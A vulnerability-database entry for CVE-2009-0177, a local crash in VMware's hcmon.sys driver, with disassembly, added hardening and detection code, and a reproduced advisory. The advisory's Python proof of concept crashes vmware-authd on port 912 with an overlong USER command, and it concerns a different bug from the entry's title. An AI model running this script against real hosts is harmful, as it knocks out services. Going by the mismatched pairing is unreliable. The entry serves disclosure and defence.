VMware Workstation hcmon.sys driver local denial-of-service vulnerability

Vulnerability ID: 1117185
Vulnerability type: Resource management error
Published: 2009-01-02
Updated: 2009-01-23
CVE number: CVE-2009-0177
CNNVD ID: CNNVD-200901-229
Platform: Multiple
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/7647
https://www.securityfocus.com/bid/33095
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-229
|Vulnerability details
VMware is virtual PC software that lets two or more Windows, DOS or Linux systems run at the same time on one machine. The hcmon.sys driver shipped with VMware does not validate the pointer that user mode passes in through a METHOD_NEITHER IOCTL before dereferencing it:

.text:00011606 loc_11606:
.text:00011606     mov  eax, [ebp+SystemBuffer]
.text:00011609     mov  [ebp+SystemBuffer2], eax
.text:0001160C     mov  ecx, [ebp+SystemBuffer2]
.text:0001160F     mov  edx, [ecx+0Ch]          ; <---- BUGCHECK
.text:00011612     cmp  edx, [ebp+var_20]
.text:00011615     jnz  short loc_11629
.text:00011617     cmp  [ebp+NumberOfBytes], 70h
.text:0001161B     jb   short loc_11629
.text:0001161D     mov  eax, [ebp+SystemBuffer2]
.text:00011620     cmp  dword ptr [eax+8], 7FFBh
.text:00011627     jbe  short loc_11638

If a local user sends IOCTL 0x8101232B to the \\.\hcmon device, the kernel can be made to crash (bugcheck).
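The root cause above is a METHOD_NEITHER handler that dereferences the caller's pointer ([ecx+0Ch]) before checking either the pointer or the buffer length. The following is an added example, not VMware's code, written as a user-mode C model of the checks a hardened handler performs: a length check first, a ProbeForRead-style validation of the user address (modelled here with a constant standing in for MmUserProbeAddress and a return value standing in for the raised exception), a single copy into a kernel-owned buffer, and only then the content checks the disassembly shows (dword at +0xC against an expected value, dword at +8 against 0x7FFB). The field names, the 2 GB user/kernel split, the status-code mapping and the `backing` parameter (the harness's stand-in for the memory the user address maps to) are assumptions for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not VMware's code): a user-mode model of how a METHOD_NEITHER
 * IOCTL handler has to treat its input pointer. With METHOD_NEITHER the I/O
 * manager hands the driver the caller's raw virtual address, so every check
 * that METHOD_BUFFERED would have done is now the driver's job. */

/* Outcome codes for the demo (the NTSTATUS mapping is an assumption). */
enum hc_status {
    HC_OK = 0,
    HC_INVALID_PARAM = 1,   /* short buffer or pointer that fails probing   */
    HC_ACCESS_DENIED = 2    /* well-formed request that fails content checks */
};

/* Sizes and offsets taken from the disassembly above (0x70 minimum length,
 * dword at +0xC compared with a local, dword at +8 compared with 0x7FFB).
 * The field names are assumptions. */
#define HCMON_MIN_INPUT    0x70u
#define HCMON_MAGIC_OFFSET 0x0Cu
#define HCMON_INDEX_OFFSET 0x08u
#define HCMON_INDEX_LIMIT  0x7FFBu

/* Stand-in for MmUserProbeAddress on a 32-bit system with a 2 GB user split
 * (assumption for the demo). */
#define USER_PROBE_ADDRESS 0x7FFF0000u

/* Model of ProbeForRead(): reject NULL, misaligned and kernel-range pointers
 * and ranges that would cross the user/kernel boundary. A real driver calls
 * ProbeForRead inside __try/__except; here a return value stands in for the
 * exception. */
static int probe_for_read(uintptr_t user_va, size_t len, size_t align) {
    if (len == 0) return 1;
    if (user_va == 0 || (user_va % align) != 0) return 0;
    if (user_va > USER_PROBE_ADDRESS || len > USER_PROBE_ADDRESS - user_va) return 0;
    return 1;
}

/* Hardened handler. user_va is the address the caller supplied; backing is the
 * harness's stand-in for the memory that address maps to. Order matters:
 * length check, probe, one copy into a kernel-owned buffer, then field checks
 * on the copy only (the caller cannot change the data between check and use). */
enum hc_status hcmon_handle_ioctl(uintptr_t user_va, const uint8_t *backing,
                                  size_t len, uint32_t expected_magic) {
    uint8_t kbuf[HCMON_MIN_INPUT];
    uint32_t magic, index;

    if (len < HCMON_MIN_INPUT) return HC_INVALID_PARAM;
    if (!probe_for_read(user_va, HCMON_MIN_INPUT, sizeof(uint32_t)))
        return HC_INVALID_PARAM;

    memcpy(kbuf, backing, HCMON_MIN_INPUT);   /* single fetch of user data */
    memcpy(&magic, kbuf + HCMON_MAGIC_OFFSET, sizeof magic);
    memcpy(&index, kbuf + HCMON_INDEX_OFFSET, sizeof index);

    if (magic != expected_magic) return HC_ACCESS_DENIED;
    if (index > HCMON_INDEX_LIMIT) return HC_ACCESS_DENIED;
    return HC_OK;
}

/* Builds a constructed 0x70-byte request with the two checked fields set. */
const uint8_t *build_request(uint32_t magic, uint32_t index) {
    static uint8_t req[HCMON_MIN_INPUT];
    memset(req, 0, sizeof req);
    memcpy(req + HCMON_MAGIC_OFFSET, &magic, sizeof magic);
    memcpy(req + HCMON_INDEX_OFFSET, &index, sizeof index);
    return req;
}

int main(void) {
    const uint32_t magic = 0x1234u;   /* constructed expected value */
    printf("valid request     -> %d\n", hcmon_handle_ioctl(0x00400000u, build_request(magic, 1), 0x70, magic));
    printf("NULL user pointer -> %d\n", hcmon_handle_ioctl(0x0u, build_request(magic, 1), 0x70, magic));
    printf("kernel-range ptr  -> %d\n", hcmon_handle_ioctl(0x80000000u, build_request(magic, 1), 0x70, magic));
    printf("short buffer      -> %d\n", hcmon_handle_ioctl(0x00400000u, build_request(magic, 1), 0x10, magic));
    return 0;
}
```

The NULL and kernel-range cases are the ones the original handler never reaches a check for: it dereferences first, which is exactly the bugcheck marked in the listing. Copying into `kbuf` before inspecting fields also closes the double-fetch window that a probe alone leaves open.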
|Vulnerability EXP
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vmware <= 2.5.1 build-126130 Remote Denial of Service

Application: Vmware

Web Site: http://www.vmware.com/

Platform: Windows *

Bug: Remote Denial of Service

Tested against: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

================

1) Introduction

================

"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications, 
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."

=======

2) Bug

=======
Vmware-authd listens on 0.0.0.0 port 912 on a Windows box by default.
A denial of service exists in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service; code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also, some older versions of this binary (like 6.00.3938.0000) don't seem vulnerable to this DoS.
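From the defender's side, the observable in this bug is a USER or PASS command whose argument is far longer than any real credential. The following is an added example, not part of the advisory, that scans the client half of a captured vmware-authd session and counts commands whose argument exceeds a limit; the 128-byte threshold, the sample session and the 350-byte username mirroring the PoC below are constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the advisory: scan the client side of a captured
 * vmware-authd session and count USER/PASS commands whose argument exceeds a
 * length limit. The limit, the sample session and the 350-byte username that
 * mirrors the PoC are constructed for the demo. */

#define AUTHD_ARG_LIMIT 128u   /* assumed threshold; real credentials are far shorter */

/* Counts USER/PASS lines whose argument is longer than limit bytes.
 * Accepts CRLF or LF line endings and a final line without a terminator. */
size_t count_overlong_auth_args(const char *session, size_t limit) {
    size_t flagged = 0;
    const char *p = session;

    while (*p != '\0') {
        const char *eol = strpbrk(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);

        if (linelen > 5 &&
            (strncmp(p, "USER ", 5) == 0 || strncmp(p, "PASS ", 5) == 0)) {
            size_t arglen = linelen - 5;          /* bytes after the verb */
            if (arglen > limit) flagged++;
        }
        p += linelen;
        while (*p == '\r' || *p == '\n') p++;     /* skip the terminator(s) */
    }
    return flagged;
}

/* Builds a constructed session: a normal login followed by the PoC's
 * 350-byte USER command, and returns how many commands get flagged. */
size_t demo_scan(void) {
    static char session[512];
    char longname[351];
    memset(longname, 'A', 350);
    longname[350] = '\0';
    snprintf(session, sizeof session,
             "USER alice\r\nPASS s3cret\r\nUSER %s\r\nPASS yo \r\n", longname);
    return count_overlong_auth_args(session, AUTHD_ARG_LIMIT);
}

int main(void) {
    printf("flagged commands in sample session: %zu\n", demo_scan());
    return 0;
}
```

The same check belongs on the receiving side: a service that reads the USER line into a bounded buffer and rejects anything over the limit before it reaches the authentication code never sees the input that crashes vmwarebase.dll.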
==================

3) Proof of concept

==================
Auth-dos.py:

import socket

target = '192.168.0.102'   # host running vmware-authd
port = 912                 # vmware-authd default listener
buff = 'A' * 350           # oversized username that triggers the crash

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
data = s.recv(1024)                          # read the service banner
s.send(('USER ' + buff + '\r\n').encode())   # overlong USER command
data = s.recv(1024)
s.send(b'PASS yo \r\n')
data = s.recv(1024)
print(" [+] sending dummy payload")
s.close()
print(" [+] done! ")

=====

4) Credits

=====

laurent gaffié

laurent.gaffie{remove_this}[at]gmail[dot]com

# milw0rm.com [2009-01-02]
|Affected products
VMware Workstation 5.5.4
VMware Player 2.5.1
|References

Source: www.vmware.com
Link: http://www.vmware.com/security/advisories/VMSA-2009-0005.html
Source: VUPEN
Name: ADV-2009-0024
Link: http://www.frsirt.com/english/advisories/2009/0024
Source: FULLDISC
Name: 20090403 VMSA-2009-0005 VMware Hosted products, VI Client and patches for ESX and ESXi resolve multiple security issues
Link: http://seclists.org/fulldisclosure/2009/Apr/0036.html
Source: MLIST
Name: [security-announce] 20090403 VMSA-2009-0005 VMware Hosted products, VI Client and patches for ESX and ESXi resolve multiple security issues
Link: http://lists.vmware.com/pipermail/security-announce/2009/000054.html
Source: VUPEN
Name: ADV-2009-0944
Link: http://www.vupen.com/english/advisories/2009/0944
Source: SECTRACK
Name: 1021512
Link: http://www.securitytracker.com/id?1021512
Source: BID
Name: 34373
Link: http://www.securityfocus.com/bid/34373
Source: SECUNIA
Name: 34601
Link: http://secunia.com/advisories/34601
Source: SECUNIA
Name: 33372
Link: http://secunia.com/advisories/33372
Source: OSVDB
Name: 51180
Link: http://osvdb.org/51180
Source: MILW0RM
Name: 7647
Link: http://milw0rm.com/exploits/7647